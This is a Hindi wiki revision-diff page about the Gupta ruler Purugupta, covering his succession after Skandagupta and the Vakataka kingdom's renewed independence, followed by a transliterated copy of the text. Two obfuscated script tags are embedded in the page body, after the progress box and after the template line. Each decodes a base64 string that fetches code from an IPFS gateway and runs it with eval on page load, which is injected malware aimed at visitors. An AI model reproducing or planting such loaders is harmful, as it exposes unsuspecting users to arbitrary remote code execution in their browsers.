Difference between revisions of "पुरुगुप्त"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('*स्कन्दगुप्त के बाद गुप्त साम्राज्य का ह्रास प्र...' के साथ नया पन्ना बनाया)
 
Line 5: Line 5:
 
*हूणों के आक्रमणों से पहले ही गुप्त साम्राज्य को जबर्दस्त चोटें लग रही थीं, अब [[वाकाटक वंश]] ने फिर से सिर उठा लिया।  
 
*हूणों के आक्रमणों से पहले ही गुप्त साम्राज्य को जबर्दस्त चोटें लग रही थीं, अब [[वाकाटक वंश]] ने फिर से सिर उठा लिया।  
 
*[[समुद्रगुप्त]] ने इन्हीं वाकाटकों को परास्त कर गुप्त साम्राज्य के अधीन किया था। पर अपने प्रदेश में वाकाटक राजा सामन्तों के रूप में विद्यमान थे।  
 
*[[समुद्रगुप्त]] ने इन्हीं वाकाटकों को परास्त कर गुप्त साम्राज्य के अधीन किया था। पर अपने प्रदेश में वाकाटक राजा सामन्तों के रूप में विद्यमान थे।  
*[[चंद्रगुप्त द्वितीय]] ने अपनी कन्या प्रभावती गुप्त का वाकाटक राजा से विवाह कर इनके साथ मैत्री तथा घनिष्ठ सम्बन्ध स्थापित किया था।  
+
*[[चन्द्रगुप्त विक्रमादित्य|चंद्रगुप्त द्वितीय]] ने अपनी कन्या प्रभावती गुप्त का वाकाटक राजा से विवाह कर इनके साथ मैत्री तथा घनिष्ठ सम्बन्ध स्थापित किया था।  
 
*हूणों के आक्रमणों के समय इन्होंने फिर से अपनी शक्ति को बढ़ाना शुरू किया, और प्रतापी स्कन्दगुप्त के मरते ही वाकाटक राजा नरेन्द्रसेन ने अपने को स्वतंत्र उदघोषित कर दिया।  
 
*हूणों के आक्रमणों के समय इन्होंने फिर से अपनी शक्ति को बढ़ाना शुरू किया, और प्रतापी स्कन्दगुप्त के मरते ही वाकाटक राजा नरेन्द्रसेन ने अपने को स्वतंत्र उदघोषित कर दिया।  
 
*एक शिलालेख से सूचित होता है, कि नरेन्द्रसेन ने अपने वंश की डूबी हुई शक्ति का पुनरुद्धार किया था।  
 
*एक शिलालेख से सूचित होता है, कि नरेन्द्रसेन ने अपने वंश की डूबी हुई शक्ति का पुनरुद्धार किया था।  

Revision as of 12:21, 9 October 2010

  • skandagupt ke bad gupt samrajy ka hras prarambh ho gaya.
  • skandagupt ki koee santan nahian thi, atah usaki mrityu ke bad purugupt samrat bana.
  • vah skandagupt ka bhaee tha, aur kumaragupt ki pattamaharani ka putr tha. is samay tak vah vriddh ho chuka tha.
  • usake rajagaddi par baithate hi gupt samrajy mean avyavastha prarambh ho gee.
  • hoonoan ke akramanoan se pahale hi gupt samrajy ko jabardast chotean lag rahi thian, ab vakatak vansh ne phir se sir utha liya.
  • samudragupt ne inhian vakatakoan ko parast kar gupt samrajy ke adhin kiya tha. par apane pradesh mean vakatak raja samantoan ke roop mean vidyaman the.
  • chandragupt dvitiy ne apani kanya prabhavati gupt ka vakatak raja se vivah kar inake sath maitri tatha ghanishth sambandh sthapit kiya tha.
  • hoonoan ke akramanoan ke samay inhoanne phir se apani shakti ko badhana shuroo kiya, aur pratapi skandagupt ke marate hi vakatak raja narendrasen ne apane ko svatantr udaghoshit kar diya.
  • ek shilalekh se soochit hota hai, ki narendrasen ne apane vansh ki doobi huee shakti ka punaruddhar kiya tha.
  • is prakar skandagupt ke nirbal bhaee purugupt ke shasan mean vakatak rajy phir se svatantr ho gaya.
  • purugupt bauddh dharm ka anuyayi tha.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

sanbandhit lekh

Template:gupt rajavansh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>